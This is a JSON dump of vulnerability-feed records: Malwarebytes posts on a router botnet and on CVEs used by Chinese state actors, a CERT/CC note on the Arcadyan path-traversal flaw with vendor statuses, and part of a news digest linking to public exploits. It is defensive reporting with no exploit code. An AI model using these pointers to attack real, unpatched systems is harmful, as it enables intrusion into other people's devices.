CVE-2021-20090 which is present in the Arcadyan firmware.\n\nIt also stands to reason to assume this is the actor that was responsible for the [largest DDoS attack](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) recorded to date, just last week.\n\n### Mitigation\n\nRealtek has since [patched](<https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf>) the vulnerabilities, but it will take a while for manufacturers who use their chipset to make the patches available to their customers. And again many of the owners of vulnerable devices are home users. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nRealTek is a common chipset used for sound and Wi-Fi by many vendors such as ARRIS, ASUSTek, Belkin, Buffalo, D-Link, EnGenius, Huawei, LG, Logitec, NetGear, TRENDnet, and many more. I found a [list of affected devices courtesy of Mainstream Technologies](<https://www.mainstream-tech.com/realtek-security-notice/>) but this is only a partial list. Alongside its list, Mainstream Technologies warns that: &quot;If your device is over 10 years old, it definitely will not get a patch. If it is over 5 years it probably will not get a patch&quot;.\n\nSo even if your device is not on it, that doesn\u2019t mean it\u2019s not vulnerable. Any device that uses a Realtek RTL819D chipset is vulnerable and the bots scanning the internet for vulnerable devices will definitely be able to find them.\n\nIt is cases like these that could end up to be a deciding factor in the discussion whether vendors/governments/[law enforcement](<https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/>) should be allowed to patch vulnerable systems that do not belong to them or to the infrastructure they are responsible for.\n\nStay safe, everyone!\n\nThe post [Realtek-based routers, smart devices are being gobbled up by a voracious botnet](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T13:36:52", "type": "malwarebytes", "title": "Realtek-based routers, smart devices are being gobbled up by a voracious botnet", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-35392", "CVE-2021-35395"], "modified": "2021-08-24T13:36:52", "id": "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-14T00:05:09", "description": "In [a joint cybersecurity advisory](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3181261/nsa-cisa-fbi-reveal-top-cves-exploited-by-chinese-state-sponsored-actors/>), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.\n\nThe advisory aims to \"inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\"\n\nThe US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. The usual targets range from organizations in the IT sector, including telecommunications service providers; the [DIB (Defense Industrial Base)](<https://www.cisa.gov/defense-industrial-base-sector>) sector, which is related to military weapons systems; and other critical infrastructure sectors.\n\nIt is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.\n\nThe advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.\n\nLast year, CISA [began publishing a catalog of actively exploited vulnerabilities](<https://www.malwarebytes.com/blog/news/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities>) that need ot be patched within two weeks on federal information systems. The agencies behind this latest advisory have also collaborated in the past on a list of [vulnerabilities favored by Russian state-sponsored threat actors](<https://www.malwarebytes.com/blog/news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities>).\n\nIf your organization's intellectual property is likely to be of interest to China, this is list is for you. And if it isn't, this list is still worth paying attention to.\n\n## The vunerabilities\n\n### Remote code execution (RCE)\n\nRCE flaws let attackers execute malicious code on a compromised, remote computer. The advisory identifies 12 RCEs: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (also known as [Log4Shell or LogJam](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>)), [CVE-2021-22205](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>), [CVE-2022-26134](<https://www.malwarebytes.com/blog/news/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited>), [CVE-2021-26855](<https://www.malwarebytes.com/blog/news/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi>), [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>), [CVE-2021-26084](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>), [CVE-2022-1388](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>), [CVE-2021-40539](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26857](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26858](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>), and [CVE-2021-27065](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>).\n\n### Arbitrary file read\n\nThe advisory identifies two arbitrary file read flaws--[CVE-2019-11510](<https://www.malwarebytes.com/blog/business/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind>) and [CVE-2021-22005](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>)--which allow users or malicious programs with low privileges to read (but not write) any file on the affected system or server. Useful for stealing data.\n\n### Authentication bypass by spoofing\n\n[CVE-2022-24112](<https://nvd.nist.gov/vuln/detail/CVE-2022-24112>) is an authentication bypass flaw that allows attackers to access resources they shouldn't have access to by spoofing an IP address.\n\n### Command injection\n\n[CVE-2021-36260](<https://www.malwarebytes.com/blog/news/2022/08/thousands-of-hikvision-video-cameras-remain-unpatched-and-vulnerable-to-takeover>) is a command injection flaw that allows attackers to execute commands of their own choosing on an affected system. A vulnerable app is usually involved in such attacks.\n\n### Command line execution\n\n[CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) is a command injection flaw that allows attackers to inject data into an affected system's command line.\n\n### Path Traversal\n\nAlso known as \"directory traversal,\" these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like `../` into file or directory paths. [CVE-2019-19781](<https://www.malwarebytes.com/blog/news/2021/06/atomic-research-institute-breached-via-vpn-vulnerability>), [CVE-2021-41773](<https://www.malwarebytes.com/blog/news/2021/10/apache-http>), and [CVE-2021-20090](<https://www.malwarebytes.com/blog/news/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago>) are all forms of path traversal attack.\n\n## Mitigations\n\nThe NSA, CISA, and FBI urge organizations to undertake the following mitigations:\n\n * * Apply patches as they come, prioritizing the most critical l flaws in your environment.\n * Use multi-factor authentication.\n * Require the use of strong, unique passwords.\n * Upgrade or replace software or devices that are at, or close to, their end of life.\n * Consider adopting a [zero-trust security model](<https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model>).\n * Monitor and log Internet-facing systems for abnormal activity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-13T16:15:00", "type": "malwarebytes", "title": "Chinese APT's favorite vulnerabilities revealed", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-13T16:15:00", "id": "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "href": "https://www.malwarebytes.com/blog/news/2022/10/psa-chinese-apts-target-flaws-that-take-full-control-of-systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2023-05-27T15:38:11", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://vulners.com/cve/CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information\n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAVM does not utilize Arcadyan components.\n\n#### References\n\n * <https://en.avm.de/security/>\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-10-07\n\n**Statement Date: October 07, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nJuniper Networks Junos OS and Junos OS Evolved are not affected by CVE-2021-20090, CVE-2021-20091, and CVE-2021-20092.\n\n#### References\n\n * [SIR-2021-353 and PR 1613180 were created for this issue.](<SIR-2021-353 and PR 1613180 were created for this issue.>)\n\n### LANCOM Systems GmbH Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-16\n\n**Statement Date: August 16, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: September 06, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nVxWorks are not affect as we do not use Arcadyan-based routers and modems\n\n### Zyxel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-18\n\n**Statement Date: August 18, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: August 31, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nAfter full investigation, D-Link has confirmed that no D-Link product are affected by this issue.\n\nRegards, security@dlink.com William Brown D-Link US SIRT\n\n#### References\n\n * [None Applicable](<None Applicable>)\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&amp;T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NETGEAR Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://vulners.com/cve/CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-10-07 20:26 UTC \n**Document Revision: ** | 15 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "cert", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2021-10-07T20:26:00", "id": "VU:914124", "href": "https://www.kb.cert.org/vuls/id/914124", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello, today I want to experiment with a new format. I will be reading last week&#x27;s news from my [@avleonovnews](<https://t.me/avleonovnews>) channel, which I found the most interesting. I do this mostly for myself, but if you like it too, then that would be great. Please subscribe to [my YouTube channel](<https://www.youtube.com/channel/UCSenC-btyVAexgSwvVtxQkg>) and my Telegram [@avleonovcom](<https://t.me/avleonovcom>).\n\nLet&#x27;s start with some new public exploits.\n\n 1. Researchers at Positive Technologies [have dropped a proof-of-concept (PoC) exploit](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>) on Twitter for a known cross-site scripting (XSS) vulnerability in the Cisco Adaptive Security Appliance (ASA) CVE-2020-3580. This flaw was patched in October. There are reports of researchers pursuing bug bounties using this exploit. Maybe you should do this too. Well, or at least ask your IT administrators if they have updated the ASA.\n 2. [F5 BIG-IQ VE Post-auth Remote Root RCE](<https://vulners.com/packetstorm/PACKETSTORM:163264>). BIG-IQ provides a single point of management for all your BIG-IP devices \u2014 whether they are on premises or in a public or private cloud. It was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection. A good reason to check if you have this in the infrastructure. But of course the fact that this is Post-auth makes it less interesting.\n 3. [VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:163268>). From the description of the vulnerability that was published in February 2021. &quot;The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.&quot; Therefore, if your IT colleagues have not patched vCenter since February, you can try to demonstrate how this vulnerability is exploited in practice.\n 4. [Solaris SunSSH 11.0 Remote Root](<https://vulners.com/packetstorm/PACKETSTORM:163232>). &quot;CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6&quot;. If you are still using Solaris in your infrastructure, this is a great opportunity to try this exploit.\n 